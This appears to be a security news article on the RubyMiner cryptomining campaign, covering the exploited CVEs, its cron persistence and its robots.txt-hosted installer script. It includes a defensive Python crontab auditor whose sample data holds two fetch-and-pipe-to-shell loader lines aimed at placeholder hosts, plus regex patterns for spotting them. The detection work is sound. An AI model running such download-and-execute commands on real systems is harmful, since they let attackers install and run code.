RubyMiner malware hits vulnerable servers to mine cryptocurrencies

Do Son · January 17, 2018

Security researchers recently observed RubyMiner, a new strain of malware being deployed online: a cryptocurrency miner found on forgotten web servers. According to findings released by Check Point and Certego, and information Ixia researchers shared, the attacks started last week, on January 9-10.

Attacks on Linux and Windows servers

Ixia security researcher Stefan Tanase said RubyMiner targets both Windows and Linux systems. The team behind RubyMiner uses a web server fingerprinting tool called p0f to scan for and identify Linux and Windows servers running outdated software. Once unpatched servers are identified, the attackers exploit known vulnerabilities against them and then use RubyMiner to infect them.

Check Point and Ixia said they observed attackers exploiting the following vulnerabilities in the recent wave of attacks:

  • Ruby on Rails XML Processor YAML Deserialization Code Execution (CVE-2013-0156) [1]
  • PHP php-cgi Query String Parameter Code Execution (CVE-2012-1823; CVE-2012-2311; CVE-2012-2335; CVE-2012-2336; CVE-2013-4878) [1, 2, 3, 4]
  • Microsoft IIS ASP Scripts Source Code Disclosure (CVE-2005-2678) [1]

Attackers hide the malicious code in the robots.txt file

In a report released last week, Check Point explores the RubyMiner infection routine on Linux systems, based on data collected from honeypot servers, and notes several creative touches by the attackers:

  • The exploit code contains a series of shell commands.
  • The attackers clear all existing cron jobs.
  • The attackers add a new hourly cron job.
  • The new cron job downloads a script hosted online.
  • This script is hosted inside the robots.txt file of various domains.
  • The script downloads and installs a modified version of the legitimate XMRig Monero miner.
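The persistence pattern above (all cron jobs wiped, then a single hourly job that pulls a script from a robots.txt URL and feeds it to a shell) is something a defender can look for directly in a host's crontab. The following crontab auditor is an added example written for this article; it is not code from Check Point, Ixia or the RubyMiner report. The sample crontab lines, the placeholder domain and the 203.0.113.10 address are constructed for illustration and are not indicators from any report.

```python
"""Crontab audit: flag entries that match the RubyMiner persistence pattern.

Added example, not from the article or from Check Point/Ixia. The crontab
below is constructed; the URL host names are placeholders, not IoCs.
"""
import re
from dataclasses import dataclass, field

# Constructed sample, in the format `crontab -l` prints on a Linux host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/15 * * * * /usr/bin/php /var/www/app/artisan schedule:run
1 * * * * wget -q -O - http://example.invalid/robots.txt | bash
0 * * * * curl -s http://203.0.113.10/robots.txt | sh
"""

URL_RE = re.compile(r"https?://[^\s'\"|;]+")          # any http(s) URL in the command
FETCHER_RE = re.compile(r"\b(curl|wget)\b")           # common download tools
SHELL_SINK_RE = re.compile(r"\|\s*(ba|z|da)?sh\b")    # "... | sh" / "... | bash"


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list = field(default_factory=list)


def is_hourly(schedule_fields):
    """True when the minute field is a fixed number and the hour field is '*'."""
    minute, hour = schedule_fields[0], schedule_fields[1]
    return hour == "*" and re.fullmatch(r"\d+", minute) is not None


def audit_crontab(text):
    """Return a Finding for every crontab entry that looks like a remote-script loader."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # not a standard five-field entry (e.g. @reboot or an env line)
        schedule, command = parts[:5], parts[5]
        reasons = []
        if FETCHER_RE.search(command) and URL_RE.search(command):
            reasons.append("downloads content from a remote URL")
        if SHELL_SINK_RE.search(command):
            reasons.append("pipes downloaded content into a shell")
        for url in URL_RE.findall(command):
            if url.rstrip("/").endswith("robots.txt"):
                reasons.append("fetches a robots.txt file as a script source")
        # An hourly schedule only matters in combination with the loader traits above.
        if reasons and is_hourly(schedule):
            reasons.append("runs hourly")
        if reasons:
            findings.append(Finding(n, command, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run it against `crontab -l` output for each user (and the files under /etc/cron.d) on a suspect host; the two constructed loader lines are flagged with all four reasons, while the backup and PHP scheduler entries pass. A sudden drop to an empty or single-entry crontab on a server that previously had several jobs is the other half of the pattern described above and is worth alerting on from configuration baselines.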

Lotem Finkelstein, a security researcher at Check Point, said the attackers are now targeting Windows IIS servers as well, but Check Point has not obtained a copy of the Windows version of RubyMiner. In addition, Check Point noted that a malware campaign in 2013 exploited the same Ruby on Rails vulnerability as RubyMiner, and speculated that the group behind that earlier campaign may be the one now extending its operations with RubyMiner.

The trend of Monero mining malware has become increasingly evident

Overall, recent months have seen a rise in attempts to spread cryptocurrency-mining malware, and Monero-mining malware in particular.

In addition to cryptojacking incidents (also Monero-based), some of the Monero-mining malware families and botnets seen in 2017 include Digmine, unnamed botnets targeting WordPress, Hexmen, Loapi, Zealot, WaterMiner, an unnamed botnet targeting IIS 6.0 servers, CodeFork and Bondnet. In just the first two weeks of 2018, there have already been PyCryptoMiner, which targets Linux servers, and another miner targeting Oracle WebLogic Server. In most incidents aimed at web servers, researchers found that attackers favored the most recent exploits, because more machines are still vulnerable to them. Strangely, the RubyMiner attackers use very old vulnerabilities, which most security software can detect.

According to Finkelstein, the RubyMiner attackers may have deliberately looked for abandoned machines, such as forgotten PCs and servers running older operating systems, so that the infected devices keep mining for the long term while staying under the security radar.

RubyMiner gangs have infected more than 700 servers

Based on the wallet addresses found in the custom XMRig miners deployed by RubyMiner, Check Point's initial statistics show around 700 infected servers, with the attackers earning about $540. Some experts believe the group could earn much more if it started using recent vulnerabilities. For example, a hacking group that began targeting Oracle WebLogic Server in October 2017 made a profit of $226,000.

Source: BleepingComputer

Written by Do Son (@DdoS), Security Researcher

Do Son is the Founder and Editor of SecurityOnline.info. Working in cybersecurity since 2013, he reports on vulnerabilities, malware, and emerging threats, providing timely analysis to help organizations and individuals stay ahead of evolving risks.